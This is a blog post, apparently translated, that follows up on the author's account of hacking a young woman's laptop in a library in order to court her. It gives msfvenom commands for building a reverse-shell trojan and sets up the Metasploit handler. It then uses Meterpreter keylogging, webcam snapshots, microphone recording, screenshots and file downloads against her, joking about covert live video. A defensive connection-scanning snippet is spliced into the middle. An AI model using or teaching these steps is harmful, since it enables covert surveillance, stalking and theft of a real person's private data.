
Notes on Flirting with a Girl in the Library (Part 2)

Yeshisan, 1 year ago (2018-09-16)

"Notes on Flirting with a Girl in the Library" is a write-up I did in early 2017. The guys in the group were quite interested in this old post. The techniques involved are really just a combination of fairly basic tricks, nothing complex or advanced. For legal reasons I removed some of the details, but since some of them asked about what happened afterwards, I'll add a bit more here.

Introduction to Meterpreter

Meterpreter is an extension module of the Metasploit framework and an indispensable post-exploitation tool. After a payload loaded in Metasploit is used against the target machine and triggered there, a channel is established that gives an interactive shell for controlling the target; that channel is Meterpreter.
As a post-exploitation module, the Meterpreter shell has many useful functions, such as adding a user, hiding things, opening a shell, obtaining user passwords, uploading and downloading files to and from the remote host, running cmd.exe, capturing the screen, gaining remote control, capturing keystrokes, clearing applications, showing the remote host's system information, and showing the remote machine's network interfaces and IP addresses. (Copied from Baidu.)

Using Meterpreter

Before using it, you first need to generate an exe trojan file with msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f exe > ./yeshisan.exe
  • msfvenom replaces the earlier msfpayload and msfencode
  • -p specifies the payload to load; here it is the reverse_tcp reverse-connection module
  • LHOST: the IP address to connect back to, i.e. this machine
  • LPORT: the port to connect back to; the default is 4444
  • -f: the output format, an exe trojan here; the output file can be specified, and by default it is generated in the root directory

When the generated trojan runs on the target machine, it initiates a TCP connection to the preset IP address and port. Locally we listen on the port the trojan connects back to, and when a request comes in, a Meterpreter session is established automatically.
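From the defender's side, the callback just described leaves a trace in the host's connection table: an established outbound connection, owned by an executable dropped in a user folder, to the handler's default port. The following is an added example (not from the original post); the netstat-style records, executable paths and addresses are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed netstat-style records (not real captures):
# (local address, remote address, state, owning executable path).
SAMPLE_CONNECTIONS = [
    ("192.168.0.7:49812", "192.168.0.3:4444", "ESTABLISHED",
     r"C:\Users\student\Downloads\yeshisan.exe"),
    ("192.168.0.7:49790", "142.250.74.36:443", "ESTABLISHED",
     r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    ("0.0.0.0:445", "0.0.0.0:0", "LISTENING", "System"),
    ("192.168.0.7:49900", "10.0.0.5:4444", "ESTABLISHED",
     r"C:\Windows\System32\svchost.exe"),
]

# LPORT the post's msfvenom command leaves at its default. Operators often
# change it (or use 443/80), so this check alone is weak evidence.
DEFAULT_HANDLER_PORTS = {4444}

# Executables launched from a user's profile folders, as a dropped EXE is.
USER_WRITABLE_DIR = re.compile(
    r"^[A-Za-z]:\\Users\\[^\\]+\\(Downloads|Desktop|AppData|Documents)\\",
    re.IGNORECASE)

@dataclass(frozen=True)
class Finding:
    image: str
    remote: str
    reasons: tuple

def score_connection(local, remote, state, image):
    """Return a Finding listing every heuristic that fired, or None."""
    if state != "ESTABLISHED":
        return None  # a reverse shell is an established outbound session
    _, _, port = remote.rpartition(":")
    reasons = []
    if int(port) in DEFAULT_HANDLER_PORTS:
        reasons.append("remote port is the default Metasploit handler port")
    if USER_WRITABLE_DIR.match(image):
        reasons.append("owning executable lives in a user-writable directory")
    return Finding(image, remote, tuple(reasons)) if reasons else None

def flag_callbacks(connections):
    """Scan a connection table; return suspicious entries, strongest first."""
    hits = [f for f in (score_connection(*c) for c in connections) if f]
    return sorted(hits, key=lambda f: len(f.reasons), reverse=True)
```

On the constructed table, `flag_callbacks(SAMPLE_CONNECTIONS)` ranks the Downloads-folder executable first (both heuristics fire) and the svchost connection second (port only); the browser's 443 session is not reported.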

So we also need to listen on port 4444 on this machine; start Metasploit via msfconsole.

[email protected]:~# msfconsole

Load the handler module

msf > use exploit/multi/handler

Load the payload; it must match the one used to generate the trojan

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

Show the options that need to be set

msf exploit(handler) > show options


What needs to be set here is LHOST and LPORT, the IP address and port to listen on. Since the trojan was generated with the default port, only the listening IP address has to be set; then run to start listening.

msf exploit(handler) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(handler) > run

After the trojan runs on the target, msf picks up the request and establishes a session

If you are not very familiar with Meterpreter, the help command gives an overview

meterpreter > help

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components

Stdapi: Webcam Commands
=======================

Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam

Priv: Elevate Commands
======================

Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes

Common Meterpreter commands

help: show help information
background: put the session in the background and return to msf
download: download a file from the target host
upload: upload a file to the target
execute: run a command on the compromised host
shell: run Windows shell commands on the compromised host (Windows hosts only)
sessions -i: switch to a session

Some additions to the earlier post

Since this is a supplement to the earlier post, I certainly won't list everything; below are a few of the commands used later on in the library story.

Keylogging: keyscan_start

We can turn on keylogging through Meterpreter to see what the girl is typing. Open Notepad and type something at random.

meterpreter > keyscan_start
Starting the keystroke sniffer...

Dump the keystroke log to check it; you can see that what I typed was meizi i love you
Dump the keystroke log: keyscan_dump

meterpreter > keyscan_dump
Dumping captured keystrokes...
meizi l <Back> i love you

Stop keylogging: keyscan_stop

Give the girl a surprise: take a photo with the laptop's webcam

List the webcams: webcam_list
Take a snapshot from a webcam: webcam_snap
Record from the microphone: record_mic

I won't go into the recording feature; if it's a phone, you know what I mean.
Combine it with the webcam and you get a live broadcast of, well, you know what. Of course I have basically never used this function; it's purely a joke.

If you want to see what the girl is doing right now, type screenshot at the command line; the captured screen image is written to the root directory.

meterpreter > screenshot
Screenshot saved to: /root/ThWrdjpy.jpeg
meterpreter >


Of course, don't forget that my original goal was the files on the girl's computer, to see whether there was any contact information. To search for files on the target computer, use the search command; search -h shows the usage.

search -h
Usage: search [-d dir] [-r recurse] -f pattern
Search for files.

OPTIONS:

-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> The file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner.
-r <opt> Recursivly search sub directories. (Default: true)

A simple example: say I want to search for all txt files

Judge from the file names whether they are what you want. Once a suspicious file is found, download it with the download command, which takes just the -r parameter followed by the path of the file.
meterpreter > download -r c:/1.txt
[*] downloading: c:/1.txt -> 1.txt
[*] downloaded : c:/1.txt -> 1.txt

Finally, I wanted to give the girl a surprise, so it was the old routine again: hijack and start apache

[email protected]:~# service apache2 start
[ ok ] Starting web server: apache2.
[email protected]:~#


Finally

You thought it ended like this????

Would that be in keeping with my usual style???

There is definitely more to the story afterwards: getting into the girl's school and using the school's xx to confess my feelings.

But

I'm too lazy to write it. The end.

Comments: 1
  • letian  Likes (0)  First reply

    Scattered and sparse, scattered and sparse
